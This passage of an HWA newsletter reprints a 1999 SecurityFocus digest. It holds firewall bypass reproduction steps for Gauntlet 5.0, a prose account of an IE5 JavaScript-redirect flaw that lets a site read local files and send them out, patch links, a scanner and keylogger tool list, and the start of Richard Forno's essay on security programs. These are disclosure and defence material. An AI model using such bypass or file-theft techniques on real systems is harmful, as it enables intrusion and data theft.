      13) Execute "cd /sys/compile/GAUNTLET-V50/".
      14) Build new kernel as required by M310-049 IP DoS kernel fix.
              # make clean
              # make depend
              # make
      15) After kernel is rebuilt, reboot machine.
      16) Download Gauntlet 5.0 kernel and cluster patch:
              File info:
              cluster.BSDI.patch      12623 Kb    Wed Sep 01 19:33:00 1999
              kernel.BSDI.patch       414 Kb      Wed Aug 04 17:54:00 1999
      17) As noted in patch install directions, execute the following:
              # sh ./cluster.BSDI.patch
              # sh ./kernel.BSDI.patch
              # cd kernel.BSDI.patch
              # sh ./apply
              # cd ../cluster.BSDI.patch
              # sh ./apply
      18) After patches are installed, reboot machine.
      19) Install ESPM-GUI on client machine. Start ESPM-GUI. Add client machine
      to trusted network group. Apply changes.
      
      20) Start web browser on client machine. Set web proxy setting to internal
      interface of firewall. Attempt to connect to external web server. Access
      is allowed. *This is correct.*
      
      20) Remove http-gw from trusted network services. Apply changes. Attempt
      to connect to external web server. Access is denied. *This is correct.*
      
      ==Problem starts here==
      
      21) Remove proxy setting in web browser on client machine. Set
      gateway/default route on client machine to internal interface of firewall. Set gateway/default
      route on server machine to external interface of firewall.
      
      22) Clear web browser cache. Attempt to connect to external web server.
      Web page is downloaded with no logs in Gauntlet.
      
      23) Start ESPM-GUI. Remove all services from trusted networks services.
      Remove client machine from ESPM network group. Apply changes.
      
      24) FTP from client machine to server. FTP connection is made though no
      rule exists.
      
      25) Start telnet server on client machine. Telnet from server to client.
      Telnet connection is made.
      
      
      12. Microsoft IE5 Javascript URL Redirection Vulnerability
      BugTraq ID: 722
      Remote: Yes
      Date Published: 1999-10-18
      Relevant URL:
      http://www.securityfocus.com/bid/722
      Summary:
      
      A malicious web site operator could design a web page that, when visited
      by an IE5 user, would read a local file from the victim host (or any file
      on the victim's network to which the victim has access) and send the
      contents of that file to a designated remote location.
      
       1) In the instance noted above, the IE5 user visits a malicious web site.
      
       2) The web site instructs the client to open another IE5 browser window
          and display the contents of a file residing on the IE5 user's host (or
          another host on the network to which the IE5 user has access).
      
       3) Immediately after opening the new browser window, the window is
          instructed to browse to a specified web site, e.g. http://malicious
          server.com/hack.cgi?doit.
      
       4) The hack.cgi?doit page does not return a web page, but instead
          redirects the window to a javascript URL containing embedded
          executable code.
      
       5) The javascript code (from step 4) can now access any files on the
          victim's host (or any file on the victim's network to which the victim
          has access) and send it to a location maintained by the malicious web
          site operator.
      
       Under normal circumstances, javascript received from a non-local
      "security zone" is not allowed to perform such actions against files on
      the local host. In this instance, however, the IE5 browser has been fooled
      (via http redirect to javascript) into thinking that the Javascript should
      execute under the security context of the local host's security zone as
      the javascript was requested from a browser displaying the local file.
      
      Microsoft has released a FAQ that contains a good description of this
      vulnerability:
      
      http://www.microsoft.com/security/bulletins/MS99-043faq.asp.
      
      III. PATCH UPDATES 1999-10-04 to 1999-10-19
      -------------------------------------------
      
      1. Vendor: Reedycreek
      Product: rpmmail
      Patch Location:
      ftp://reedycreek.com/reedycreek/rpmmaildemo/rpmmail-1.4.tar.gz
      ftp://reedycreek.com/reedycreek/rpmmaildemo/rpmmail-1.4-2.i386.rpm
      Vulnerability Patched: rpmmail Remote Command Execution Vulnerability
      BugTraq ID:
      Relevant URLS:
      http://www.reedycreek.com
      
      2. Vendor: Microsoft
      Product: Microsoft JET 4.0SP1
      Vulnerability Patched: Microsoft JET/ODBC Patch and RDS Fix Registry Key Vulnerabilities
      BugTraq ID: 654
      Patch Location:
      http://officeupdate.microsoft.com/articles/mdac_typ.htm
      Relevant URLS:
      http://www.securityfocus.com/bid/654/
      
      3. Vendor: Microsoft
      Product: Internet Explorer 5.0 
      Vulnerability Patched: Microsoft IE5 Download Behavior Vulnerability
      BugTraq ID: 674
      Patch Location:
      http://www.microsoft.com/msdownload/iebuild/dlbhav/en/dlbhav.htm
      http://windowsupdate.microsoft.com
      Relevant URLS:
      http://www.securityfocus.com/bid/674
      
      4. Vendor: Novell
      Product: Novell Client 3.1 for Windows
      Vulnerability Patched: Novell Client Denial of Service Vulnerability
      BugTraq ID: 700
      Patch Location:
      http://support.novell.com/cgi-bin/search/tidfinder.cgi?2945422
      Relevant URLS:
      http://www.securityfocus.com/bid/700
      http://support.novell.com
      
      5. Vendor: Microsoft
      Product: IIS
      Vulnerability Patched: IIS Writeable mailroot/ftproot DoS Vulnerability
      BugTraq ID:
      Patch Location:
      A tip was added to the Microsoft Security Checklist regarding this problem.
      http://www.microsoft.com/security/products/iis/CheckList.asp
      Relevant URLS:
      http://www.microsoft.com/security
      
      6. Vendor: Roxen
      Product: Challenger Webserver
      Vulnerability Patched: Referer Tag Vulnerability
      BugTraq ID:
      Patch Location:
      ftp://ftp.roxen.com/pub/roxen/patches/roxen_1.3.111-htmlparse.pike.patch
      Relevant URLS:
      http://www.roxen.com
      
      7. Vendor: Red Hat
      Product: RedHat Linux
      Vulnerability Patched: RedHat PAM NIS Locked Accounts Vulnerability
      BugTraq ID: 697
      Patch Location:
      RedHat released new PAM packages available at:
      ftp://updates.redhat.com/6.1/i386/pam-0.68-8.i386.rpm
      ftp://updates.redhat.com/6.1/SRPMS/pam-0.68-8.src.rpm
      Relevant URLS:
      http://www.redhat.com/corp/support/errata/index.html
      http://www.securityfocus.com/bid/697
      
      8. Vendor: Microsoft
      Product: Microsoft Internet Explorer
      Vulnerability Patched: Microsoft IE5 IFRAME Vulnerability
      BugTraq ID: 696
      Patch Location:
      http://www.microsoft.com/windows/ie/download/windows.htm
      MSIE Only (Intel): ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/IE50/MSHTML-fix/x86/q243638.exe
      MSIE Only (Alpha): ftp://ftp.microsoft.com/peropsys/IE/IE-Public/Fixes/usa/IE50/MSHTML-fix/Alpha/q243638.exe
      Relevant URLS:
      http://security.microsoft.com
      http://www.securityfocus.com/bid/696
      
      9. Vendor: Red Hat
      Product: RedHat Linux
      Vulnerability Patched: RedHat lpr/lpd Vulnerabilities
      BugTraq ID: 718
      Patch Location:
       Red Hat Linux 4.x:
       Intel:
       ftp://ftp.redhat.com/pub/redhat/updates/4.2/i386/lpr-0.43-0.4.2.i386.rpm
       Alpha:
       ftp://ftp.redhat.com/pub/redhat/updates/4.2/alpha/lpr-0.43-0.4.2.alpha.rpm
       Sparc:
       ftp://ftp.redhat.com/pub/redhat/updates/4.2/sparc/lpr-0.43-0.4.2.sparc.rpm
       Source packages:
       ftp://ftp.redhat.com/pub/redhat/updates/4.2/SRPMS/lpr-0.43-0.4.2.src.rpm
      
       Red Hat Linux 5.x:
       Intel:
       ftp://ftp.redhat.com/pub/redhat/updates/5.2/i386/lpr-0.43-0.5.2.i386.rpm
       Alpha:
       ftp://ftp.redhat.com/pub/redhat/updates/5.2/alpha/lpr-0.43-0.5.2.alpha.rpm
       Sparc:
       ftp://ftp.redhat.com/pub/redhat/updates/5.2/sparc/lpr-0.43-0.5.2.sparc.rpm
       Source packages:
       ftp://ftp.redhat.com/pub/redhat/updates/5.2/SRPMS/lpr-0.43-0.5.2.src.rpm
      
       Red Hat Linux 6.x:
       Intel:
       ftp://ftp.redhat.com/pub/redhat/updates/6.1/i386/lpr-0.43-2.i386.rpm
       Alpha:
       ftp://ftp.redhat.com/pub/redhat/updates/6.0/alpha/lpr-0.43-2.alpha.rpm
       Sparc:
       ftp://ftp.redhat.com/pub/redhat/updates/6.0/sparc/lpr-0.43-2.sparc.rpm
       Source packages:
       ftp://ftp.redhat.com/pub/redhat/updates/6.1/SRPMS/lpr-0.43-2.src.rpm
      
      Relevant URLS:
      http://www.redhat.com/corp/support/errata/index.html
      http://www.securityfocus.com/bid/718
      
      10. Vendor: Microsoft
      Product: Microsoft Internet Explorer
      Vulnerability Patched: Microsoft IE5 Javascript URL Redirection Vulnerability
      BugTraq ID: 722
      Patch Location:
      Workaround detailed in advisory located at:
      http://www.microsoft.com/security/bulletins/MS99-043faq.asp
      Full patch not released yet.
      Relevant URLS:
      http://security.microsoft.com
      http://www.securityfocus.com/bid/722
      
      11. Vendor: Compaq
      Product: Tru64 Unix
      Vulnerability Patched: Multiple Vendor CDE dtaction Userflag Buffer Overflow Vulnerability
      BugTraq ID: 635
      Special Note: This vulnerability affected products from multiple vendors;
      this patch is only for Tru64/Compaq products.
      Patch Location:
      http://www.service.digital.com/patches
      Patch file name: SSRT0615U_dtaction.tar
      Use the FTP access option, select DIGITAL_UNIX directory
      then choose the appropriate version directory and
      download the patch accordingly.
      Relevant URLS:
      http://ftp.service.digital.com/public/osf/v4.0d/ssrt0615u_dtaction.README
      http://www.securityfocus.com/bid/635
      
      12. Vendor: Debian
      Product: Debian GNU/Linux
      Vulnerability Patched: Multiple Vendor amd Buffer Overflow Vulnerability
      BugTraq ID: 614
      Special Note: This vulnerability affected products from multiple vendors;
      this patch is only for Debian products.
      Patch Location:
      http://security.debian.org/dists/stable/updates/source/amd_upl102.orig.tar.gz
      Relevant URLS:
      http://www.debian.org/security
      http://www.securityfocus.com/bid/614
      
      13. Vendor: Debian
      Product: GNU/Linux
      Vulnerability Patched: Linux mirror Vulnerability
      BugTraq ID:
      Patch Location:
      http://security.debian.org/dists/stable/updates/source/mirror_2.9.orig.tar.gz
      Relevant URLS:
      http://www.debian.org/security
      
      14. Vendor: Mandrake
      Product: Linux-Mandrake
      Vulnerability Patched: Multiple Linux Vendor lpr/lpd Vulnerabilities
      BugTraq ID: 718
      Patch Location:
      ftp://csociety-ftp.ecn.purdue.edu/pub/mandrake/updates/6.1/SRPMS/lpr-0.43-1mdk.src.rpm
      Relevant URLS:
      http://www.securityfocus.com/bid/718
      
      15. Vendor: LinuxPPC
      Product: LinuxPPC
      Vulnerability Patched: Multiple Linux Vendor PAM NIS Locked Accounts Vulnerability
      BugTraq ID: 697
      Patch Location:
      ftp://ftp.linuxppc.org/linuxppc-1999/security/RPMS/pam-0.68-8.ppc.rpm
      Relevant URLS:
      http://www.linuxppc.com/security/1999/10/12.shtml
      http://www.securityfocus.com/bid/697
      
      IV.  INCIDENTS SUMMARY 1999-10-04 to 1999-10-19
      -----------------------------------------------
      
      1. Interesting scans in the past few days (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-09-29&msg=LOBIJPKEFBHDAAAA@mailcity.com
      
      1. Re: Interesting scans in the past few days (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-01&msg=19991006055120.25151.qmail@securityfocus.com
      
      2. Random malfunction or hack?
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-01&msg=4.2.0.58.19991007104131.041af600@localhost
      
      3. Notifying possibly compromised sites & SANS 99 (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-8&msg=19991010030053.2954.qmail@securityfocus.com
      
      4. Site for sharing TCPDumps, firewall logs, etc.? (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-8&msg=19991010030259.3005.qmail@securityfocus.com
      
      5. Log sharing
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-8&msg=3.0.3.32.19991012151149.0180dc90@192.133.124.9
      
      6. Attack methodology
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-8&msg=19991012230738.14149.qmail@securityfocus.com
      
      7. Slow scan of 80,8080,3128/tcp from multiple sources (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-8&msg=991013161041HK.24502@weba2.iname.net
      
      8. RES: Anyone seen traffic headed for UDP port 31789? (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-8&msg=01fd01bf1669$99f4d600$431ba396@montes.lac.inpe.br
      
      9. Intrusion Detection rfc draft
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-15&msg=199910152054.QAA08702@iridium.mv.net
      
      10. directed broadcasts to UDP ports 41508, 41524, 41530.
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-15&msg=199910171958.PAA08727@rum.cs.rochester.edu
      
      V. VULN-DEV RESEARCH LIST SUMMARY 1999-10-04 to 1999-10-19
      ----------------------------------------------------------
      
      1. Re: Guestbook perl script (error fix - Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=37F95DCC.948D1E78@thievco.com
      
      2. The PcWeek crack
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=37F95F46.28909284@thievco.com
      
      3. Re: Cisco IOS password types overview. (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=19991004181832.A7373@noc.untraceable.net
      
      4. Timbuktu32 (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=37F9879E.A4A0603A@thievco.com
      
      5. Re: solaris DoS (fwd)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=Pine.LNX.4.10.9910042219160.22584-100000@noella.mindsec.com
      
      6. FW: puzzlecrypt(tm--dr) (hint:sploit against dr - so I don't go deaf)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=LPBBLGAAOGLDBEMOMNAKGENBCAAA.dr@v-wave.com
      
      7. Newbie in Jeopardy
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=19991006202821.17986.rocketmail@web1006.mail.yahoo.com
      
      8. Window manager - implementation bug/feature ??? (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-1&msg=19991007042501.WPTW29939.mta02@onebox.com
      
      9. fbsd 3.3 ospf_monitor research (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-8&msg=19991008202347.17546.qmail@nwcst293.netaddress.usa.net
      
      10. SSH and X11 forwarding
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-8&msg=19991008154553.A7420@sec.sprint.net
      
      11. NT SysKey should be breakable (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-8&msg=37FE5604.E3DDEE4B@enternet.se
      
      12. 2 dodgy network programs
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-8&msg=199910091022.LAA02585@notatla.demon.co.uk
      
      13. Free BSD 2.2.x listen() problem / FTP exploit
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-15&msg=9628.991015@SECURITY.NNOV.RU
      
      14. Classes?
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-15&msg=004301bf17b3$00563de0$5016aacf@verti.com
      
      15. possible gnome remote overflow
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-15&msg=380B7985.1FAB00E@rconnect.com
      
      
      VI.  SECURITY JOBS SUMMARY 1999-10-04 to 1999-10-19
      ---------------------------------------------------
      
      Discussion:
      
      1. yet another question about entering the security field (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=19991005205523.1111.qmail@securityfocus.com
      
      Seeking Position:
      
      1. Contact: I am looking for a good company to work for NYC - Edward Saxon, <ed_saxon@hotmail.com>
      Qualifications:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&thread=19991005000908.57894.qmail@hotmail.com
      
      2. Contact: Looking for security system administration position - Ender Wiggin, Mike@aviary-mag.com
      Qualifications:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=016701bf0eab$26b42580$5f47fea9@25te1
      
      Seeking Staff:
      
      1. Unix/Network/Security Engineer - NYC
      Reply to: beau@nyc-search.com
      Position Requirements:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=37F9492A.5BDA96EC@nyc-search.com
      
      2. Developer needed - San Mateo - California
      Reply to: Alfred Huger, ah@securityfocus.com
      Position Requirements:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=Pine.GSO.4.10.9910051306001.20005-100000@www.securityfocus.com
      
      3. Unix/Network Security Engineer Needed In Maryland
      Reply to: Brian Mitchell <bmitchell@icscorp.com>
      Position Requirements:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=007301bf103b$bc3a1060$120210ac@icscorp.com
      
      4. Domain Expert / Security Development / IT / Logistics #123
      Reply to: Lori Sabat <lori@altaassociates.com>
      Position Requirements:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=19991006130555.1532.qmail@securityfocus.com
      
      5. Security Verification Analyst #123
      Reply to: Lori Sabat <lori@altaassociates.com>
      Position Requirements:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=19991006131420.1670.qmail@securityfocus.com
      
      6. looking for information security manager....
      Reply to: Bryan Bushman <bryan.bushman@capitalone.com>
      Position Requirements:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-1&msg=00069FC7.C22211@capitalone.com
      
      7. Job opportunities in San Jose
      Reply to: Beth Friedman <friedman@counterpane.com>
      Position Requirements:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-8&msg=19991011182755.28416.qmail@securityfocus.com
      
      8. 3com Job Posting
      Reply to: andy_mcdaniel@3com.com
      Position Requirements:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-8&msg=8825680B.000B3EAF.00@hqoutbound.ops.3com.com
      
      VII.  SECURITY SURVEY 1999-10-04 to 1999-10-19
      ----------------------------------------------
      
      The question for 1999-10-04 to 1999-10-19 was:
      
      "Do you think the recent changes to US encryption export law will increase the use of encryption
      on the internet?"
      
      Results:
      
      Yes 30% / 41 votes
      No 69% / 92 votes
      Total number of votes: 133 votes
      
      III.  SECURITY FOCUS EVENTS for 1999-10-04 to 1999-10-19
      ---------------------------------------------------------
      
      1. New Scoring and Comments under Tools, Products, Library and Links
      Relevant URL:
      http://www.securityfocus.com/level2/bottom.html?go=announcements&id=35
      Summary:
      
      You can now score and comment on items in the tools, products, library and links sections of
      the site. Tell others what you think of certain items. Learn what others think are the best
      resources. To vote you must be a registered user and sign-in.
      
      2. New Guest Feature - THE TRINITY OF A QUALITY INFORMATION SECURITY PROGRAM v2
      Relevant URL:
      http://www.securityfocus.com/level2/bottom.html?go=forums&forum=2&id=327
      Summary:
      
      There is a three-fold and ultimate goal of any organizational information security program. Simply put,
      such a program must take adequate measures to protect and provide levels of confidentiality, integrity,
      and availability of information resources. Yet all too often security is bypassed or ignored because it is
      too imposing, too complicated, and not perceived as an asset to the organization by both management
      and employees. A common misperception is that increased security leads to decreased convenience or
      "creature comforts." Not necessarily. Security of a corporation's information can be strong, robust,
      and secure without presenting a large burden on the user community.
      
      IX.  SECURITY FOCUS TOP 6 TOOLS 1999-10-04 to 1999-10-19
      --------------------------------------------------------
      
      1. UCGI Vulnerability Scanner 1.56
      by su1d sh3ll
      Relevant URL:
      http://infected.ilm.net/unlg/
      CGI vulnerability scanner version 1.56. Checks for over 90 CGI
      vulnerabilities. Tested on slackware linux with kernel 2.0.35-2.2.5,
      Freebsd 2.2.1-3.2, IRIX 5.3, DOS, and windows.
      
      2. NTInfoScan
      by David Litchfield
      Relevant URL:
      http://www.infowar.co.uk/mnemonix/ntinfoscan.htm
      NTInfoScan is a security scanner designed specifically for the Windows
      NT 4.0 operating system. It's simple to use - you run it from a command
      line - and when the scan is finished it produces an HTML based report of
      security issues found with hyper-text links to vendor patches and further
      information. NTInfoScan is currently at version 4.2.2. It tests a number
      of services such as ftp, telnet, web service, for security problems. Added
      to this NTInfoScan will check NetBIOS share security and User account
      security.
      
      3. SuperScan 2.0.4
      by Robin Keir <robin@keir.net>
      Relevant URL:
      http://members.home.com/rkeir/software.html
      This is a powerful connect-based TCP port scanner, pinger and hostname
      resolver. Multithreaded and asynchronous techniques make this program
      extremely fast and versatile. Perform ping scans and port scans using any
      IP range or specify a text file to extract addresses from. Scan any port
      range from a built in list or any given range. Resolve and reverse-lookup
      any IP address or range. Modify the port list and port descriptions using
      the built in editor. Connect to any discovered open port using
      user-specified "helper" applications (e.g. Telnet, Web browser, FTP) and assign
      a custom helper application to any port. Save the scan list to a text
      file.  Transmission speed control. User friendly interface. Includes help
      file.
      
      4. PacketX
      by NTObjectives Inc.
      Relevant URL:
      http://www.ntobjectives.com
      PacketX is a native Windows NT firewall testing tool that allows for
      complete TCP/IP packet creation and provides businesses a method for
      verifying a firewall vendor's product claims. Featuring packet spoofing
      technology and raw packet creation techniques, this tool is essentially a
      packet cannon that shoots custom packets at a firewall in order to verify
      the approval/denial of internet domain address against firewall ACL's.
      
      5. Achtung
      by Codex Data Systems
      Relevant URL: N/A
      A Windows keylogging program by Codex Data Systems.
      
      6. Custom Attack Scripting Language
      by Thomas Ptacek & Timothy Newsham
      Relevant URL: N/A
      Custom Auditing Scripting Language (CASL) implements a packet shell
      environment for the Custom Auditing Scripting Language that is the basis
      for the Cybercop(tm)  line of products by Network Associates. The CASL
      environment provides an extremely high performance environment for sending
      and receiving any normal and/or morbid packet stream to firewalls,
      networking stacks and network intrusion detection systems as well as being
      sufficiently rich of a language to write honeypots, virtual firewalls,
      surfer hotel, phantom networks and jails.
      
      
      X. SPONSOR INFORMATION - Tripwire Security
      ------------------------------------------
      
      URL: http://www.tripwiresecurity.com/
      
      This Newsletter was sponsored by Tripwire Security. Tripwire Security
      Systems, Inc. (TSS) is a Portland-based software development company
      specializing in system security and policy compliance applications. The
      company is developing a family of Defense in Depth(SM) security solutions
      based on its Tripwire file integrity assessment technology. Tripwire's file
      integrity assessment technology is the most fundamental component of any
      Intrusion Detection system. Tripwire monitors all servers and clients on a
      network, detecting and reporting any changes to critical system or data
      files. Tripwire can absolutely, unequivocally determine if a protected
      file has been altered in a way that violates the policy set by the
      administrator. This ensures that any change, whether due to an external
      intruder or internal misuse, will be identified and documented on a timely
      basis.  After an intrusion has been detected, Tripwire enables the system
      administrator to quickly identify which systems have been compromised,
      allowing the organization to get back to business.
      
      
      
      Alfred Huger
      VP of Operations
      Security Focus
      
      @HWA      
      
94.0  THE TRINITY OF A QUALITY INFORMATION SECURITY PROGRAM v2
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.securityfocus.com/ 

      by Richard Forno <rforno@taoiw.org>
           Tue Oct 19 1999 

                                                                                                                                                                                



      THE TRINITY OF A QUALITY INFORMATION SECURITY PROGRAM v2.0 RICHARD FORNO 
      <rforno@taoiw.org> 
      FALL 1999

     There is a three-fold and ultimate goal of any organizational information 
     security program. Simply put, such a program must take adequate measures 
     to protect and provide levels of confidentiality, integrity, and 
     availability of information resources. Yet all too often security is 
     bypassed or ignored because it is too imposing, too complicated, and not 
     perceived as an asset to the organization by both management and 
     employees. A common misperception is that increased security leads to 
     decreased convenience or "creature comforts." Not necessarily. Security of 
     a corporation's information can be strong, robust, and secure without 
     presenting a large burden on the user community. 

     To reach this objective, it is essential to conduct a proactive 
     "perception management" analysis (PMA) within the organization as part of 
     an ongoing self-evaluation of the security program. The PMA must ask these 
     questions: 

     1. Does our security program adequately address the fundamental principles 
     of Confidentiality, Integrity, and Availability? (mentioned below) 

     2. Is there appropriate support and "buy-in" from management and users? 

     3. Is it "doable"? 

     The first two questions are issues unto themselves and quite
     self-explanatory. The third, however, is a key facet to a security program
     and the objective of this article. Contrary to popular belief, security
     programs do NOT have to be complicated, but they MUST fulfill their
     requirements by being secure and ongoing. That is its singular goal.
     Large, bloated security models lead to inefficiency in management,
     communications, resource allocation, security operations, and employee
     compliance with requirements. Unfortunately, as information moves faster
     than corporate actions, so too does the level of threats, vulnerability,
     and risk to such information at your company.

     This article will discuss the elements of a Perception Management Analysis
     in evaluating a corporate security posture. It is important to remember
     that for this article, "information security" is not limited to "computer
     security" but includes computers, networks, data, the infrastructure
     required to convey proprietary data to another person (such as cellular
     phones and pagers) and the day-to-day human factors involved with the
     exchange of information.

     To further illustrate that security must be "doable" and understandable by
     everyone in the organization, this article is written in "plain English"
     with several tongue-in-cheek observations and comments. It's a known fact
     that simple stuff presented in clear, concise language will be
     understood by a greater audience. A little humor never hurts, either.

     PMA 1 

     Does it meet the fundamental principles (or Requirements) of information 
     security? 

     The following three principles can be addressed through appropriate
     policies, procedures, and standards of conduct for your corporate
     information resources. It is essential to understand that without proper,
     written security policies approved by your senior management, there is
     no baseline to either measure the effectiveness of your security program
     or enforce security requirements, policies, or procedures within your
     organization. The three guiding principles that form the foundation for a
     good security program are:

     CONFIDENTIALITY: This is simply keeping your company information private.
     Just like the spy agencies take great precautions to protect theirs, so
     too must corporations secure their data from domestic or foreign
     competitors, criminals, and any other malcontent. The last thing you
     want are the plans or schematics for the "Super-Secret Widget 2000" to
     appear in the Los Angeles Times or even worse, find that your competitor
     has released the "Not-A-Super-Secret-Anymore Widget 2000 Plus" before you
     do at a lower price, and therefore undercut your market and steal your
     profits while leaving you to pick up the R&D tab!

     Any organization that is operated by people has inherent vulnerabilities.
     Therefore, to insure confidentiality of your corporate information, start
     with the people. Develop and require signed non-disclosure and information
     resources acceptable use statements from all employees, from CEO to New
     Hires. As time progresses, or your requirements for confidentiality grow,
     deploy encryption or authentication technologies and use automated
     technical means to provide information confidentiality. Just remember
     that people will need to use these tools -- and that in and of itself
     provides a great vulnerability [1].

     [1] People, particularly Americans, are all too trusting of others. It is
     very easy to trick someone into revealing their passwords or access codes
     over the phone or even in person by impersonating an "expert" or someone
     from Network Support.

     INTEGRITY: Protecting information so that it cannot be surreptitiously
     manipulated for an adversary's gain is critical. When your company books
     are audited, moving even one decimal point in a spreadsheet could prove
     disastrous. A $4.5 million loss may be expected or easy to swallow,
     but how would a $45 million loss look (or taste) if you're upper
     management? We DO live in an age where they don't shoot the messenger,
     right?

     An organization that is operated by people has inherent vulnerabilities.
     Therefore, to insure the integrity of your corporate information, start
     with the people. Develop a process of background checks for key people such
     as systems and database administrators, security staff, and those who
     have "detailed, unmonitored, insider access" to your corporate information
     resources and would be in a position to easily co-opt your sensitive data.
     Insure your data is regularly backed up and stored in a manner
     representative of the sensitivity of the data itself. Software- and
     Management-based preventive measures to protect your data can't hurt
     either. Above all, never blindly believe what you see on the screen. Double
     check your work and numbers -- an age-old remedy to prevent big mistakes!

     AVAILABILITY: Simply put, your employees need to work in a technological
     environment that is supportive of them doing their jobs. Paying people to
     come to work and play Solitaire on their computers since they cannot
     access the network or their files is a waste of time, labor, and
     resources. You must insure information resources (networks, systems, and
     the information contained or processed within) are running to insure
     productivity.

     An organization that is operated by people has inherent vulnerabilities.
     Therefore, to insure the availability of your corporate information, start
     with the people. Develop methods to insure authorized users cannot
     inadvertently bring down a network or jam-up the e-mail system. Insure
     that your network administrators provide for redundancy of information
     resources, stand-by power, backup capabilities, and related services.

     Any organization that is run by people has inherent vulnerabilities.
     That's due to the fact that most people are unaware of their security
     responsibilities or security issues, threats, and risks to their
     information. They are unassuming when it comes to how a system should
     perform [2]. A company may spend millions on firewalls and encryption
     technologies and believe that they have the Good CyberKeeping Seal of
     Impenetrable Security -- but their secrets still get out. If you have
     closed off all technical routes for information to escape, what routes,
     pray tell, are left for information to be disclosed, damaged, or denied
     access? You guessed it, partner... The people.

     Is there any redundancy here? Where does it seem the greatest security
     risk to your information come from? Hardware failures? Sometimes. Acts of
     God? Occasionally. People? You betcha -- ninety percent of the time. But
     rest assured, O Security Officer, for if you have adequately addressed
     these three areas through appropriate policy and procedure, your security
     program is off to a good start!

     [2] It is very common for a person to have a system error message alert pop
     up every morning for six months before anything is done to remedy the
     problem. The user in question's answer was "I thought that was supposed to
     be that way."

     PMA 2 

     Is there appropriate management support and "buy in" for your security 
     program at all levels of your organization? 

     All too often, information security programs are thrown together
     retroactively after an incident has occurred or when someone on the top
     floor hears about a "hacker" story on the morning news and in their
     executive wisdom decides to do something about it. What they are going
     to do they have no idea -- but "we've got to do something, quick!"

     My experience in helping establish the Information Security Office for the
     US House of Representatives was indicative of this mindset. One incident
     that comes to mind is when a senior House Member was on vacation in Florida
     where his cellular phone traffic was picked up by a third party who then
     transmitted their recordings of his conversation to the local and national
     media. Suffice it to say, there was a considerable amount of political
     embarrassment for this Congressman. The following Monday, our office was
     tasked to develop a guidance document for "proper cellular phone usage" and
     locate secured (i.e., encrypted) cellular phones for Member use. By
     Thursday we had a report and quasi-policy document making its way to the
     House leadership on our findings and recommendations. The next week, our
     "guidance document" on cellular phone use was approved by the House
     leadership and sent out to all Members. However, the four-inch thick
     Agency-wide information security policy document requested by the House
     leadership took nearly eighteen months to be approved. Why? Internal
     requirements (such as password lengths or aging) were not as "glamorous" or
     highly-visible as a Congressman's intercepted and well-publicized phone
     conversation. And, as the 434 other Congressmen used cellular phones as
     well, there was a nearly unanimous buy-in from the "users" of the system.

     A security program is effective only when implemented and properly
     maintained. However, the strongest management and user support of security
     programs is usually centered on the fallout after an embarrassment or
     incident occurs -- corrective versus preventive actions to remedy a
     newly-discovered vulnerability or comply with a federal or corporate
     mandate. Directives resulting from Duress are not the best way to build a
     security program.

     To get upper management support for security requires tact and an ability
     to clearly outline and convey the level of risk facing the corporation in
     a manner that stresses the risks to the corporation most upper managers
     are interested in avoiding: loss of public or client confidence, the
     waning of shareholder support, and most importantly, the potential
     financial losses to the corporation. The following bullets provide some
     general guidance statements to assist corporate security officers in
     "selling security" to upper management:

   
     Senior management support is essential in establishing a robust security 
     program, especially in approving policies, procedures, and budget requests 
     for security products. However, to maintain an effective security program, 
     it is critical to involve the user community in the security program and 
     foster a "security mindset" throughout the organization. Believe it or 
